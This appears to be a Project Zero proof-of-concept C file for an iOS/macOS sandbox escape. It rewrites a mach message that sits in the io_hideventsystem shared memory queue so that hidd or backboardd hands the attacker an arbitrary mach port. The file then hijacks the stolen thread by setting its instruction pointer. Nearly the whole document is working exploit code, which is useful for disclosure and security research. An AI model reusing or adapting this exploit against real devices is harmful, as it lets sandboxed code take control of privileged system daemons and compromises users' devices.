// @i41nbeer
/*
iOS/MacOS sandbox escape due to mach message sent from shared memory

io_hideventsystem sets up a shared memory event queue; at the end of this shared memory buffer it puts
a mach message which it sends whenever it wants to notify a client that there's data available
in the queue.

As a client we can modify this mach message such that the server (hidd on MacOS, backboardd on iOS)
will send us an arbitrary mach port from its namespace with an arbitrary disposition.

This is a minimal PoC to demonstrate the issue. Interpose it in to the PoC for P0 1623, Apple issue 695930632
*/

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

#include <mach/mach.h>
#include <mach/mach_vm.h>

#include <pthread.h>

int done = 0;

void* thread_func(void* arg) {
  mach_port_t thread_port = (mach_port_t)arg;

  x86_thread_state64_t state;
  mach_msg_type_number_t stateCount = x86_THREAD_STATE64_COUNT;

  memset(&state, 0, sizeof(state));
  
  state.__rip = 0x414141414141;


  thread_suspend(thread_port);

  thread_set_state(thread_port, x86_THREAD_STATE64, (thread_state_t)&state, x86_THREAD_STATE64_COUNT);

  thread_resume(thread_port);

  return NULL;
}

kern_return_t my_mach_vm_map
(
  vm_map_t target_task,
  mach_vm_address_t *address,
  mach_vm_size_t size,
  mach_vm_offset_t mask,
  int flags,
  mem_entry_name_port_t object,
  memory_object_offset_t offset,
  boolean_t copy,
  vm_prot_t cur_protection,
  vm_prot_t max_protection,
  vm_inherit_t inheritance) {
  
  int do_it = 0;

  if (!done && object != MACH_PORT_NULL) {
    do_it = 1;
  }

  // call original
  kern_return_t ret =
    mach_vm_map(target_task,
                address,
                size,
                mask,
                flags,
                object,
                offset,
                copy,
                cur_protection,
                max_protection,
                inheritance);


  if (do_it) {
    uint32_t* data_queue_header = (uint32_t*)*address;
  
    printf("address: %p\n", (void*)*address);
    printf("size: %zx\n", size);

    mach_msg_header_t* msg = (mach_msg_header_t*) (((*address) + size) - 0x1000 + 0x10);

    printf("%p\n", msg);
    for (int i = 0; i < 6; i++) {
      uint32_t* raw = (uint32_t*)msg;
      printf("%08x\n", raw[i]);
    }
    // construct a fake mach message which send's us an arbitrary mach port from the target

    msg->msgh_bits = MACH_MSGH_BITS_SET_PORTS(MACH_MSG_TYPE_COPY_SEND, MACH_MSG_TYPE_COPY_SEND, 0); // remote, local, voucher
    msg->msgh_local_port = 0x507; // the port we want
    msg->msgh_id = 0x123123;
    
    done = 1;
  }

  return ret;
}

int got_port = 0;
mach_msg_return_t my_mach_msg(
  mach_msg_header_t *msg,
  mach_msg_option_t option,
  mach_msg_size_t send_size,
  mach_msg_size_t rcv_size,
  mach_port_name_t rcv_name,
  mach_msg_timeout_t timeout,
  mach_port_name_t notify)
{
  mach_msg_return_t ret = mach_msg(
    msg,
    option,
    send_size,
    rcv_size,
    rcv_name,
    timeout,
    notify);

  if (option & MACH_RCV_MSG && msg->msgh_id == 0x123123 && !got_port) {
    got_port = 1;
    mach_port_t stolen_port = msg->msgh_remote_port;
    printf("found stolen port: %x\n", stolen_port);
    printf("look in lsmp to see what port this was :)\n");
    pthread_t th;
    pthread_create(&th, NULL, thread_func, (void*)stolen_port);
  }

  return ret;
}


typedef struct interposer {
  void* replacement;
  void* original;
} interpose_t;

__attribute__((used)) static const interpose_t interposers[]
  __attribute__((section("__DATA, __interpose"))) =
    { {.replacement = (void*)my_mach_vm_map, .original = (void*)mach_vm_map},
      {.replacement = (void*)my_mach_msg, .original = (void*)mach_msg}
		};


